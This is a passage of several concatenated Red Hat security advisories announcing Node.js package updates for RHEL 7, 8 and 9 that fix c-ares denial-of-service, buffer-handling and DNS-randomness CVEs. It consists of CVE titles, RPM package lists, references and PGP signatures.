rh-nodejs14-nodejs-debuginfo-14.21.3-4.el7.s390x.rpm  
rh-nodejs14-nodejs-devel-14.21.3-4.el7.s390x.rpm  
rh-nodejs14-nodejs-full-i18n-14.21.3-4.el7.s390x.rpm  
rh-nodejs14-npm-6.14.18-14.21.3.4.el7.s390x.rpm

x86_64:  
rh-nodejs14-nodejs-14.21.3-4.el7.x86_64.rpm  
rh-nodejs14-nodejs-debuginfo-14.21.3-4.el7.x86_64.rpm  
rh-nodejs14-nodejs-devel-14.21.3-4.el7.x86_64.rpm  
rh-nodejs14-nodejs-full-i18n-14.21.3-4.el7.x86_64.rpm  
rh-nodejs14-npm-6.14.18-14.21.3.4.el7.x86_64.rpm

Red Hat Software Collections for RHEL(v. 7):

Source:  
rh-nodejs14-nodejs-14.21.3-4.el7.src.rpm

noarch:  
rh-nodejs14-nodejs-docs-14.21.3-4.el7.noarch.rpm

x86_64:  
rh-nodejs14-nodejs-14.21.3-4.el7.x86_64.rpm  
rh-nodejs14-nodejs-debuginfo-14.21.3-4.el7.x86_64.rpm  
rh-nodejs14-nodejs-devel-14.21.3-4.el7.x86_64.rpm  
rh-nodejs14-nodejs-full-i18n-14.21.3-4.el7.x86_64.rpm  
rh-nodejs14-npm-6.14.18-14.21.3.4.el7.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-31124  
https://access.redhat.com/security/cve/CVE-2023-31130  
https://access.redhat.com/security/cve/CVE-2023-31147  
https://access.redhat.com/security/cve/CVE-2023-32067  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJkrqzNAAoJENzjgjWX9erESuAP/ibSBdF1DR/I/vUgD2OqpvaH  
evULtjwOdp31vlestbl+DM3DrhyUb1fbscYHSVwK+PHC0nHlhUmSUghjLKQS2JU/  
udMBSUbDfLw950fGcS3lp/DT5sAvchPXQy2GYjOdjwZVJAsE52ecetzdd3G2xc+0  
cNn0XcRuSPFtkS47sPkeZdlHd17RDy2fgIHsTrJ9wm4lO7az3pqNqSegrLpIVbXr  
Y+S+I+yVmlasQ9/l6BUG3JTp5zsQpItWF8DkXvPrv59saLRLo+Vz8ursOjWW0ihE  
DnMg0hznfknP0FmEr1o70AcEzhSBSvA0X4qlUttORdhoaN8KLtaXjNiMVMke4asw  
prvDiJCoPO7y2pZFIw2oRt0d92/xZRE5T6t0UhGw1hejMPPKP7tcTsTpzoGtWHw3  
VzgD322B7I6hSqJP1q18Q1bG2m7hm4QtxTSF+557VjBFMpqPSiKDRkUnb7CigJuz  
wgaKN2IP1iTeIOpjZpnBa0EiPszUmSN+FxSqo/1BchQSGomaONWk5XJtVYSO4ZYm  
Uo4qiM6p1EE5jMuBgkHwml5uY4EAemyHfGWobyjrylF4aGYZ11iYJayTIcZktmzC  
bTT3Mwdj4d2l+fgyf7s38tA5hgpD3fgdF9TH+FTtEJUmJucBF47P/A01v5RypfAC  
wcnuYaT1q7Bg8mySBCqN  
=FTmv  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4039-01

Red Hat Security Advisory 2023-4034-01 - Node.js is a software development platform for building fast and scalable network applications in the JavaScript programming language. Issues addressed include a denial of service vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: nodejs:16 security update  
Advisory ID:       RHSA-2023:4034-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4034  
Issue date:        2023-07-12  
CVE Names:         CVE-2023-31124 CVE-2023-31130 CVE-2023-31147   
                   CVE-2023-32067   
=====================================================================

1. Summary:

An update for the nodejs:16 module is now available for Red Hat Enterprise  
Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

Node.js is a software development platform for building fast and scalable  
network applications in the JavaScript programming language.

Security Fix(es):

* c-ares: 0-byte UDP payload Denial of Service (CVE-2023-32067)

* c-ares: Buffer Underwrite in ares_inet_net_pton() (CVE-2023-31130)

* c-ares: Insufficient randomness in generation of DNS query IDs  
(CVE-2023-31147)

* c-ares: AutoTools does not set CARES_RANDOM_FILE during cross compilation  
(CVE-2023-31124)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2209494 - CVE-2023-31124 c-ares: AutoTools does not set CARES_RANDOM_FILE during cross compilation  
2209497 - CVE-2023-31130 c-ares: Buffer Underwrite in ares_inet_net_pton()  
2209501 - CVE-2023-31147 c-ares: Insufficient randomness in generation of DNS query IDs  
2209502 - CVE-2023-32067 c-ares: 0-byte UDP payload Denial of Service

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
nodejs-16.19.1-2.module+el8.8.0+19038+6f60344f.src.rpm  
nodejs-nodemon-2.0.20-3.module+el8.8.0+19038+6f60344f.src.rpm  
nodejs-packaging-25-1.module+el8.5.0+10992+fac5fe06.src.rpm

aarch64:  
nodejs-16.19.1-2.module+el8.8.0+19038+6f60344f.aarch64.rpm  
nodejs-debuginfo-16.19.1-2.module+el8.8.0+19038+6f60344f.aarch64.rpm  
nodejs-debugsource-16.19.1-2.module+el8.8.0+19038+6f60344f.aarch64.rpm  
nodejs-devel-16.19.1-2.module+el8.8.0+19038+6f60344f.aarch64.rpm  
nodejs-full-i18n-16.19.1-2.module+el8.8.0+19038+6f60344f.aarch64.rpm  
npm-8.19.3-1.16.19.1.2.module+el8.8.0+19038+6f60344f.aarch64.rpm

noarch:  
nodejs-docs-16.19.1-2.module+el8.8.0+19038+6f60344f.noarch.rpm  
nodejs-nodemon-2.0.20-3.module+el8.8.0+19038+6f60344f.noarch.rpm  
nodejs-packaging-25-1.module+el8.5.0+10992+fac5fe06.noarch.rpm

ppc64le:  
nodejs-16.19.1-2.module+el8.8.0+19038+6f60344f.ppc64le.rpm  
nodejs-debuginfo-16.19.1-2.module+el8.8.0+19038+6f60344f.ppc64le.rpm  
nodejs-debugsource-16.19.1-2.module+el8.8.0+19038+6f60344f.ppc64le.rpm  
nodejs-devel-16.19.1-2.module+el8.8.0+19038+6f60344f.ppc64le.rpm  
nodejs-full-i18n-16.19.1-2.module+el8.8.0+19038+6f60344f.ppc64le.rpm  
npm-8.19.3-1.16.19.1.2.module+el8.8.0+19038+6f60344f.ppc64le.rpm

s390x:  
nodejs-16.19.1-2.module+el8.8.0+19038+6f60344f.s390x.rpm  
nodejs-debuginfo-16.19.1-2.module+el8.8.0+19038+6f60344f.s390x.rpm  
nodejs-debugsource-16.19.1-2.module+el8.8.0+19038+6f60344f.s390x.rpm  
nodejs-devel-16.19.1-2.module+el8.8.0+19038+6f60344f.s390x.rpm  
nodejs-full-i18n-16.19.1-2.module+el8.8.0+19038+6f60344f.s390x.rpm  
npm-8.19.3-1.16.19.1.2.module+el8.8.0+19038+6f60344f.s390x.rpm

x86_64:  
nodejs-16.19.1-2.module+el8.8.0+19038+6f60344f.x86_64.rpm  
nodejs-debuginfo-16.19.1-2.module+el8.8.0+19038+6f60344f.x86_64.rpm  
nodejs-debugsource-16.19.1-2.module+el8.8.0+19038+6f60344f.x86_64.rpm  
nodejs-devel-16.19.1-2.module+el8.8.0+19038+6f60344f.x86_64.rpm  
nodejs-full-i18n-16.19.1-2.module+el8.8.0+19038+6f60344f.x86_64.rpm  
npm-8.19.3-1.16.19.1.2.module+el8.8.0+19038+6f60344f.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-31124  
https://access.redhat.com/security/cve/CVE-2023-31130  
https://access.redhat.com/security/cve/CVE-2023-31147  
https://access.redhat.com/security/cve/CVE-2023-32067  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJkrqzFAAoJENzjgjWX9erEixYP/3ajNyoNWaPuUzmBVOCUKFC2  
suQW+Fcg9fAngeGEdUqRlvHJ8hFDVVPuIJVTM6xVtz6qfZNSX2mktjht6bUj0QNr  
VZ19ti2k6UCTtgDeHGsNmWv4m8subL31k8E8n6+x8JC2oMDHYwssp3IQVdIzVGV/  
1qiTl0NwHUChJE6XLscca3iIYABRCXRVb+7MIn3UynZdGjvtaRbiIsY0S3pgXqgC  
KXLd+H6RKPiCJ1wO2hMzfMeLRIiVlS/M37I0kmJ77QfOmmZcgpmb011FHHlUy3RM  
BMsuvAtal7VZzwPtOHJy5vD3RgWmxw5uUnkXbXL+M3k+nLxJ318aboXPboSSM5xv  
WjErRSVg+up2tZ1kc7yE8J668h7kRmcCTiI0JBFvYiw4fgxizc11f7kBHTghCg/2  
p9QpsrW8in3jkIBZDgQFjZ/vA4X9icwjKMC5VqkHGuvE/NzqvdxRUiwm2seJvNx1  
dz8pu98EJKldCLT4vRVUp5s0h93LxbDEXf+BRacZCQmpmSTAdG5VW1cVNJuBga98  
dVB1Y71wD3VJTkpCmDclbwLpI2sHBu20ZFDqX5ISW9ltE6sZMfHw1pDel4Ix6i5V  
xwF7ZaV/oa3BR+BWA55ZzebKGlPrQjOKTRYm5Gl3vwJWmaGxBhDc8lBy435l5hr7  
z17k3TtKn0FI4xX5d5CW  
=lJNY  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4034-01

Red Hat Security Advisory 2023-4033-01 - Node.js is a software development platform for building fast and scalable network applications in the JavaScript programming language. Issues addressed include a denial of service vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: nodejs:16 security update  
Advisory ID:       RHSA-2023:4033-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4033  
Issue date:        2023-07-12  
CVE Names:         CVE-2023-31124 CVE-2023-31130 CVE-2023-31147   
                   CVE-2023-32067   
=====================================================================

1. Summary:

An update for the nodejs:16 module is now available for Red Hat Enterprise  
Linux 8.6 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream EUS (v.8.6) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

Node.js is a software development platform for building fast and scalable  
network applications in the JavaScript programming language.

Security Fix(es):

* c-ares: 0-byte UDP payload Denial of Service (CVE-2023-32067)

* c-ares: Buffer Underwrite in ares_inet_net_pton() (CVE-2023-31130)

* c-ares: Insufficient randomness in generation of DNS query IDs  
(CVE-2023-31147)

* c-ares: AutoTools does not set CARES_RANDOM_FILE during cross compilation  
(CVE-2023-31124)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2209494 - CVE-2023-31124 c-ares: AutoTools does not set CARES_RANDOM_FILE during cross compilation  
2209497 - CVE-2023-31130 c-ares: Buffer Underwrite in ares_inet_net_pton()  
2209501 - CVE-2023-31147 c-ares: Insufficient randomness in generation of DNS query IDs  
2209502 - CVE-2023-32067 c-ares: 0-byte UDP payload Denial of Service

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.8.6):

Source:  
nodejs-16.19.1-2.module+el8.6.0+19139+7f27a8ff.src.rpm  
nodejs-nodemon-2.0.20-3.module+el8.6.0+19139+7f27a8ff.src.rpm  
nodejs-packaging-25-1.module+el8.5.0+10992+fac5fe06.src.rpm

aarch64:  
nodejs-16.19.1-2.module+el8.6.0+19139+7f27a8ff.aarch64.rpm  
nodejs-debuginfo-16.19.1-2.module+el8.6.0+19139+7f27a8ff.aarch64.rpm  
nodejs-debugsource-16.19.1-2.module+el8.6.0+19139+7f27a8ff.aarch64.rpm  
nodejs-devel-16.19.1-2.module+el8.6.0+19139+7f27a8ff.aarch64.rpm  
nodejs-full-i18n-16.19.1-2.module+el8.6.0+19139+7f27a8ff.aarch64.rpm  
npm-8.19.3-1.16.19.1.2.module+el8.6.0+19139+7f27a8ff.aarch64.rpm

noarch:  
nodejs-docs-16.19.1-2.module+el8.6.0+19139+7f27a8ff.noarch.rpm  
nodejs-nodemon-2.0.20-3.module+el8.6.0+19139+7f27a8ff.noarch.rpm  
nodejs-packaging-25-1.module+el8.5.0+10992+fac5fe06.noarch.rpm

ppc64le:  
nodejs-16.19.1-2.module+el8.6.0+19139+7f27a8ff.ppc64le.rpm  
nodejs-debuginfo-16.19.1-2.module+el8.6.0+19139+7f27a8ff.ppc64le.rpm  
nodejs-debugsource-16.19.1-2.module+el8.6.0+19139+7f27a8ff.ppc64le.rpm  
nodejs-devel-16.19.1-2.module+el8.6.0+19139+7f27a8ff.ppc64le.rpm  
nodejs-full-i18n-16.19.1-2.module+el8.6.0+19139+7f27a8ff.ppc64le.rpm  
npm-8.19.3-1.16.19.1.2.module+el8.6.0+19139+7f27a8ff.ppc64le.rpm

s390x:  
nodejs-16.19.1-2.module+el8.6.0+19139+7f27a8ff.s390x.rpm  
nodejs-debuginfo-16.19.1-2.module+el8.6.0+19139+7f27a8ff.s390x.rpm  
nodejs-debugsource-16.19.1-2.module+el8.6.0+19139+7f27a8ff.s390x.rpm  
nodejs-devel-16.19.1-2.module+el8.6.0+19139+7f27a8ff.s390x.rpm  
nodejs-full-i18n-16.19.1-2.module+el8.6.0+19139+7f27a8ff.s390x.rpm  
npm-8.19.3-1.16.19.1.2.module+el8.6.0+19139+7f27a8ff.s390x.rpm

x86_64:  
nodejs-16.19.1-2.module+el8.6.0+19139+7f27a8ff.x86_64.rpm  
nodejs-debuginfo-16.19.1-2.module+el8.6.0+19139+7f27a8ff.x86_64.rpm  
nodejs-debugsource-16.19.1-2.module+el8.6.0+19139+7f27a8ff.x86_64.rpm  
nodejs-devel-16.19.1-2.module+el8.6.0+19139+7f27a8ff.x86_64.rpm  
nodejs-full-i18n-16.19.1-2.module+el8.6.0+19139+7f27a8ff.x86_64.rpm  
npm-8.19.3-1.16.19.1.2.module+el8.6.0+19139+7f27a8ff.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-31124  
https://access.redhat.com/security/cve/CVE-2023-31130  
https://access.redhat.com/security/cve/CVE-2023-31147  
https://access.redhat.com/security/cve/CVE-2023-32067  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJkrqy9AAoJENzjgjWX9erEed0P/2qeGttuYqzka5anQqCOc4Of  
Kw8VB/3Iw6zJZ/S07QcxXkFIJdWMZsR0RZdqGTIeTo1B5f3GUt6c2gGsfKZHuxs4  
SHIpacTXeCVhvZMdlyAHM9ZG6dv0v5NG4+vZmT9fcBTQRi1Xj5X4PaEViFzEqUpD  
dJYhCag8DUYUNHVv/5tv4dIfvRW9UDdxysWmjZgEDPVqjAee3ydZ4+grzmLJmXwj  
9VZrZcB73JwsIbm/MNqmYWDqoip/UtPHFfMsZGhn19MlrcZYmC4hK5hpWitL/tN0  
vmpnC9RRrbQ/VXGHqYD0YGFatYlImMYH8JtGYDw/VzDD7EG8tv1+w+LgA4GUETwd  
+ox27z7kicp8Tb0arKNO3tyY2XeOhNIWeLv/ObpXREZWNQ/OkX5GKg3U1Z/3fKJS  
DjonTtkbqBZLxy0QjN/wQ+5MjHQx8swQeO/yGLg+jZQJVE0XCN4l/YXnDD8vduER  
L2TzidXEU+qcGrCc/QW3dwCFnB9Hp+4khIEITAdp2pDfiJ0zizCRxl9MnL7l/hsZ  
SLBS4En9w6lN3R0aRxf4fjuiXksDm4KSuHy1TvWzFbs6QcDvt6dWgzVnuNMeJjGT  
87C4GJP0YT9jQe2JFPhtBilsSJZpI6BY02q0gJfzywDL9b73XpcOq7FvkBlN8MQm  
wPRuirjwtR56vZv0at2A  
=ZPgw  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4033-01

Red Hat Security Advisory 2023-4036-01 - Node.js is a software development platform for building fast and scalable network applications in the JavaScript programming language. Issues addressed include a denial of service vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: nodejs security update  
Advisory ID:       RHSA-2023:4036-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4036  
Issue date:        2023-07-12  
CVE Names:         CVE-2023-31124 CVE-2023-31130 CVE-2023-31147   
                   CVE-2023-32067   
=====================================================================

1. Summary:

An update for nodejs is now available for Red Hat Enterprise Linux 9.0  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream EUS (v.9.0) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

Node.js is a software development platform for building fast and scalable  
network applications in the JavaScript programming language.

Security Fix(es):

* c-ares: 0-byte UDP payload Denial of Service (CVE-2023-32067)

* c-ares: Buffer Underwrite in ares_inet_net_pton() (CVE-2023-31130)

* c-ares: Insufficient randomness in generation of DNS query IDs  
(CVE-2023-31147)

* c-ares: AutoTools does not set CARES_RANDOM_FILE during cross compilation  
(CVE-2023-31124)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2209494 - CVE-2023-31124 c-ares: AutoTools does not set CARES_RANDOM_FILE during cross compilation  
2209497 - CVE-2023-31130 c-ares: Buffer Underwrite in ares_inet_net_pton()  
2209501 - CVE-2023-31147 c-ares: Insufficient randomness in generation of DNS query IDs  
2209502 - CVE-2023-32067 c-ares: 0-byte UDP payload Denial of Service

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.9.0):

Source:  
nodejs-16.18.1-4.el9_0.src.rpm

aarch64:  
nodejs-16.18.1-4.el9_0.aarch64.rpm  
nodejs-debuginfo-16.18.1-4.el9_0.aarch64.rpm  
nodejs-debugsource-16.18.1-4.el9_0.aarch64.rpm  
nodejs-full-i18n-16.18.1-4.el9_0.aarch64.rpm  
nodejs-libs-16.18.1-4.el9_0.aarch64.rpm  
nodejs-libs-debuginfo-16.18.1-4.el9_0.aarch64.rpm  
npm-8.19.2-1.16.18.1.4.el9_0.aarch64.rpm

noarch:  
nodejs-docs-16.18.1-4.el9_0.noarch.rpm

ppc64le:  
nodejs-16.18.1-4.el9_0.ppc64le.rpm  
nodejs-debuginfo-16.18.1-4.el9_0.ppc64le.rpm  
nodejs-debugsource-16.18.1-4.el9_0.ppc64le.rpm  
nodejs-full-i18n-16.18.1-4.el9_0.ppc64le.rpm  
nodejs-libs-16.18.1-4.el9_0.ppc64le.rpm  
nodejs-libs-debuginfo-16.18.1-4.el9_0.ppc64le.rpm  
npm-8.19.2-1.16.18.1.4.el9_0.ppc64le.rpm

s390x:  
nodejs-16.18.1-4.el9_0.s390x.rpm  
nodejs-debuginfo-16.18.1-4.el9_0.s390x.rpm  
nodejs-debugsource-16.18.1-4.el9_0.s390x.rpm  
nodejs-full-i18n-16.18.1-4.el9_0.s390x.rpm  
nodejs-libs-16.18.1-4.el9_0.s390x.rpm  
nodejs-libs-debuginfo-16.18.1-4.el9_0.s390x.rpm  
npm-8.19.2-1.16.18.1.4.el9_0.s390x.rpm

x86_64:  
nodejs-16.18.1-4.el9_0.x86_64.rpm  
nodejs-debuginfo-16.18.1-4.el9_0.i686.rpm  
nodejs-debuginfo-16.18.1-4.el9_0.x86_64.rpm  
nodejs-debugsource-16.18.1-4.el9_0.i686.rpm  
nodejs-debugsource-16.18.1-4.el9_0.x86_64.rpm  
nodejs-full-i18n-16.18.1-4.el9_0.x86_64.rpm  
nodejs-libs-16.18.1-4.el9_0.i686.rpm  
nodejs-libs-16.18.1-4.el9_0.x86_64.rpm  
nodejs-libs-debuginfo-16.18.1-4.el9_0.i686.rpm  
nodejs-libs-debuginfo-16.18.1-4.el9_0.x86_64.rpm  
npm-8.19.2-1.16.18.1.4.el9_0.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-31124  
https://access.redhat.com/security/cve/CVE-2023-31130  
https://access.redhat.com/security/cve/CVE-2023-31147  
https://access.redhat.com/security/cve/CVE-2023-32067  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJkrqy8AAoJENzjgjWX9erEKJ8QAJxKxAA+Y+Pv8URTAy4Q9Hby  
E+tojNCd1nX9i1+8CWk62BDjYUujxE4URawpZi5XhLY4DvNYxlkExR6VouoKumno  
fJoBiAAPsjLnNfUECQpSrwfwmdB6b8q0LQQGNYIuKXdKYW/udBddDtXVrlCFjAsK  
FCQbBL4/a/TWnT7AXU513p845+d8zeGQ6gEw4mstTbnGsg/jj69h6H7TYdsW1Eq3  
BnF/0GtDyiNKv3GgvWuXe8WQili1kYTZLDUnsm2onljuGJzQGxrmXkR8GZ/131+6  
oFB0exQWwyru5kUu76LFSDjyABpsd4rP2Jjdk7x4nlrmIEvxqzRgW+dF43Ucvxau  
RiDltNUnSuEI1yoT11Safd2qojfRA7PCl6D28cUG0fgVIzhqlWGIOvNkhBp05wS0  
gmuAL15WJzF+9o77/ZPqbWjB6xDYRgHrKtMYLHRCdrPSCu5ErafLggggUi60D1yq  
WCioRmMjBtuklklb/z8g+E7XrCSXff4usCDldJc7IhikQc2IKpkkGi44M6ELntdI  
ujOhsZjH0bmW6wz88RKEigCT6icHrwX3uElUYdj56WLwB8NKDmUgn11WijbTg7+T  
/arXJ7L93JuaJ9v9OR4+AO2jx5cME/vMtXaFhJzXhuMx2RTiXdNSCQG9Yh/FeO5v  
1OyLwi0IsLapSJL6mjTN  
=0cqs  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4036-01

Red Hat Security Advisory 2023-4035-01 - Node.js is a software development platform for building fast and scalable network applications in the JavaScript programming language. Issues addressed include buffer overflow and denial of service vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: nodejs:18 security update  
Advisory ID:       RHSA-2023:4035-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4035  
Issue date:        2023-07-12  
CVE Names:         CVE-2022-4904 CVE-2023-31124 CVE-2023-31130   
                   CVE-2023-31147 CVE-2023-32067   
=====================================================================

1. Summary:

An update for the nodejs:18 module is now available for Red Hat Enterprise  
Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

Node.js is a software development platform for building fast and scalable  
network applications in the JavaScript programming language.

Security Fix(es):

* c-ares: 0-byte UDP payload Denial of Service (CVE-2023-32067)

* c-ares: buffer overflow in config_sortlist() due to missing string length  
check (CVE-2022-4904)

* c-ares: Buffer Underwrite in ares_inet_net_pton() (CVE-2023-31130)

* c-ares: Insufficient randomness in generation of DNS query IDs  
(CVE-2023-31147)

* c-ares: AutoTools does not set CARES_RANDOM_FILE during cross compilation  
(CVE-2023-31124)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2168631 - CVE-2022-4904 c-ares: buffer overflow in config_sortlist() due to missing string length check  
2209494 - CVE-2023-31124 c-ares: AutoTools does not set CARES_RANDOM_FILE during cross compilation  
2209497 - CVE-2023-31130 c-ares: Buffer Underwrite in ares_inet_net_pton()  
2209501 - CVE-2023-31147 c-ares: Insufficient randomness in generation of DNS query IDs  
2209502 - CVE-2023-32067 c-ares: 0-byte UDP payload Denial of Service

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
nodejs-18.14.2-3.module+el8.8.0+19021+4b8b11cc.src.rpm  
nodejs-nodemon-2.0.20-2.module+el8.8.0+18432+27f188ac.src.rpm  
nodejs-packaging-2021.06-4.module+el8.7.0+15582+19c314fa.src.rpm

aarch64:  
nodejs-18.14.2-3.module+el8.8.0+19021+4b8b11cc.aarch64.rpm  
nodejs-debuginfo-18.14.2-3.module+el8.8.0+19021+4b8b11cc.aarch64.rpm  
nodejs-debugsource-18.14.2-3.module+el8.8.0+19021+4b8b11cc.aarch64.rpm  
nodejs-devel-18.14.2-3.module+el8.8.0+19021+4b8b11cc.aarch64.rpm  
nodejs-full-i18n-18.14.2-3.module+el8.8.0+19021+4b8b11cc.aarch64.rpm  
npm-9.5.0-1.18.14.2.3.module+el8.8.0+19021+4b8b11cc.aarch64.rpm

noarch:  
nodejs-docs-18.14.2-3.module+el8.8.0+19021+4b8b11cc.noarch.rpm  
nodejs-nodemon-2.0.20-2.module+el8.8.0+18432+27f188ac.noarch.rpm  
nodejs-packaging-2021.06-4.module+el8.7.0+15582+19c314fa.noarch.rpm  
nodejs-packaging-bundler-2021.06-4.module+el8.7.0+15582+19c314fa.noarch.rpm

ppc64le:  
nodejs-18.14.2-3.module+el8.8.0+19021+4b8b11cc.ppc64le.rpm  
nodejs-debuginfo-18.14.2-3.module+el8.8.0+19021+4b8b11cc.ppc64le.rpm  
nodejs-debugsource-18.14.2-3.module+el8.8.0+19021+4b8b11cc.ppc64le.rpm  
nodejs-devel-18.14.2-3.module+el8.8.0+19021+4b8b11cc.ppc64le.rpm  
nodejs-full-i18n-18.14.2-3.module+el8.8.0+19021+4b8b11cc.ppc64le.rpm  
npm-9.5.0-1.18.14.2.3.module+el8.8.0+19021+4b8b11cc.ppc64le.rpm

s390x:  
nodejs-18.14.2-3.module+el8.8.0+19021+4b8b11cc.s390x.rpm  
nodejs-debuginfo-18.14.2-3.module+el8.8.0+19021+4b8b11cc.s390x.rpm  
nodejs-debugsource-18.14.2-3.module+el8.8.0+19021+4b8b11cc.s390x.rpm  
nodejs-devel-18.14.2-3.module+el8.8.0+19021+4b8b11cc.s390x.rpm  
nodejs-full-i18n-18.14.2-3.module+el8.8.0+19021+4b8b11cc.s390x.rpm  
npm-9.5.0-1.18.14.2.3.module+el8.8.0+19021+4b8b11cc.s390x.rpm

x86_64:  
nodejs-18.14.2-3.module+el8.8.0+19021+4b8b11cc.x86_64.rpm  
nodejs-debuginfo-18.14.2-3.module+el8.8.0+19021+4b8b11cc.x86_64.rpm  
nodejs-debugsource-18.14.2-3.module+el8.8.0+19021+4b8b11cc.x86_64.rpm  
nodejs-devel-18.14.2-3.module+el8.8.0+19021+4b8b11cc.x86_64.rpm  
nodejs-full-i18n-18.14.2-3.module+el8.8.0+19021+4b8b11cc.x86_64.rpm  
npm-9.5.0-1.18.14.2.3.module+el8.8.0+19021+4b8b11cc.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-4904  
https://access.redhat.com/security/cve/CVE-2023-31124  
https://access.redhat.com/security/cve/CVE-2023-31130  
https://access.redhat.com/security/cve/CVE-2023-31147  
https://access.redhat.com/security/cve/CVE-2023-32067  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
